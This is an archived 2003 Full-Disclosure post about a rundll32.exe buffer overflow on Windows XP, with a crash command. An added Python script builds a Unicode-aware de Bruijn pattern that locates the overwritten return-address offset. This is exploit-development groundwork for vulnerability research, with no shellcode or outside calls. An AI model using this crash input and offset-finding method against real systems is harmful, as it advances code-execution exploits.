[Full-Disclosure] rundll32.exe buffer overflow

From: Rick (rikulat_private)
Date: Sun Jul 06 2003 - 11:26:58 PDT


    Hi,
     
    There is a buffer overflow in rundll32.exe when it is passed a big string as
    the routine name for a module. I've tested this on Windows XP SP1, but other
    versions of Windows might be vulnerable.
     
    rundll32.exe  advpack32.dll,<'A'x499>   
     
    advpack32.dll is just an example. Any executable/DLL will work. The
    cmdline does get converted to UNICODE, and EIP ends up being 00410041.
     
    -
    Rick Patel
    
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    
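The post above gives one hard data point: the routine name is converted to UNICODE before the copy that overflows, and an all-'A' routine name leaves EIP = 00410041. The script below is an added example, not code from the post or from rundll32 itself. It works through the byte arithmetic behind that value (UTF-16LE turns "AA" into 41 00 41 00, which read as a little-endian DWORD is 0x00410041), and then goes one step beyond the post: because a UTF-16LE overwrite exposes only two payload characters per 32-bit register, it builds a routine-name pattern whose every 2-character window is unique (a de Bruijn sequence B(62,2)), so a crash EIP maps back to a single offset in the payload. Function names, the 62-symbol alphabet, and the "simulated" EIP values computed from the encoded buffer are assumptions of this example; nothing here launches rundll32.exe or reproduces the crash.

```python
"""Byte arithmetic behind the rundll32 Unicode overflow report (added example)."""
import string

# Alphabet for the pattern: 62 printable symbols that survive as-is in a routine name.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits


def build_argument(module="advpack32.dll", routine_name="A" * 499):
    """Command-line tail exactly as in the post: <module>,<routine name>."""
    return f"{module},{routine_name}"


def routine_name_as_unicode(arg):
    """UTF-16LE bytes of the routine name: what the post says the command
    line is converted to before the copy that overflows."""
    return arg.split(",", 1)[1].encode("utf-16-le")


def dword_at(buf, off):
    """Little-endian DWORD at byte offset off: the value a saved return
    address would hold if these four bytes overwrote it."""
    return int.from_bytes(buf[off:off + 4], "little")


def chars_from_eip(eip):
    """Recover the two payload characters encoded in a UTF-16LE overwrite.
    Returns (pair, odd): odd is True when the text landed one byte off the
    DWORD boundary (0xYY00XX00 instead of the post's 0x00YY00XX shape)."""
    b = eip.to_bytes(4, "little")
    if b[1] == 0 and b[3] == 0:
        return bytes([b[0], b[2]]).decode("ascii"), False
    if b[0] == 0 and b[2] == 0:
        return bytes([b[1], b[3]]).decode("ascii"), True
    raise ValueError(f"0x{eip:08x} does not look like a UTF-16LE text overwrite")


def de_bruijn(alphabet, n):
    """de Bruijn sequence B(k, n): every length-n window is unique (cyclically).
    Standard recursive construction; with n=2 over 62 symbols it is 3844 long."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def unicode_pattern(length):
    """Routine-name pattern whose 2-char windows are all distinct. A classic
    3-char cyclic pattern is ambiguous here because only 2 chars reach EIP."""
    seq = de_bruijn(ALPHABET, 2)
    if length > len(seq):
        raise ValueError("requested pattern longer than the de Bruijn period")
    return seq[:length]


def offset_from_eip(pattern, eip):
    """(character index into pattern, odd) for the pair that overwrote EIP."""
    pair, odd = chars_from_eip(eip)
    idx = pattern.find(pair)
    if idx < 0 or pattern.find(pair, idx + 1) >= 0:
        raise ValueError(f"pair {pair!r} not found or ambiguous in pattern")
    return idx, odd


def byte_offset_from_eip(pattern, eip):
    """Byte offset into the UTF-16LE copy where the overwriting DWORD started.
    Even alignment: [c_i 00 c_i+1 00] at byte 2*i; odd: [00 c_i 00 c_i+1] at 2*i-1."""
    idx, odd = offset_from_eip(pattern, eip)
    return 2 * idx - (1 if odd else 0)


if __name__ == "__main__":
    # The post's payload: every aligned DWORD of the converted name is 0x00410041.
    wide = routine_name_as_unicode(build_argument())
    print(f"'A'*499 -> {len(wide)} UTF-16LE bytes, DWORD at 0: 0x{dword_at(wide, 0):08x}")
    # Same crash with the pattern instead of 'A's: EIP now names its own offset.
    pat = unicode_pattern(499)
    print("pattern argument:", build_argument(routine_name=pat)[:60], "...")
    simulated_eip = dword_at(pat.encode("utf-16-le"), 200)   # constructed, not a real crash
    print(f"simulated EIP 0x{simulated_eip:08x} -> byte offset "
          f"{byte_offset_from_eip(pat, simulated_eip)}")
```

Two caveats a practitioner would carry over when doing this for real. First, 0x00410041 in the post decodes to the pair "AA", which in an all-'A' payload says nothing about where the return address sits; the pattern exists precisely to recover that. Second, the pattern assumes the characters reach the stack unchanged; if the Unicode conversion or a later case-mapping alters them (for example uppercasing the routine name), restrict `ALPHABET` to symbols that survive that path before trusting the offset.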



    This archive was generated by hypermail 2b30 : Sun Jul 06 2003 - 12:54:11 PDT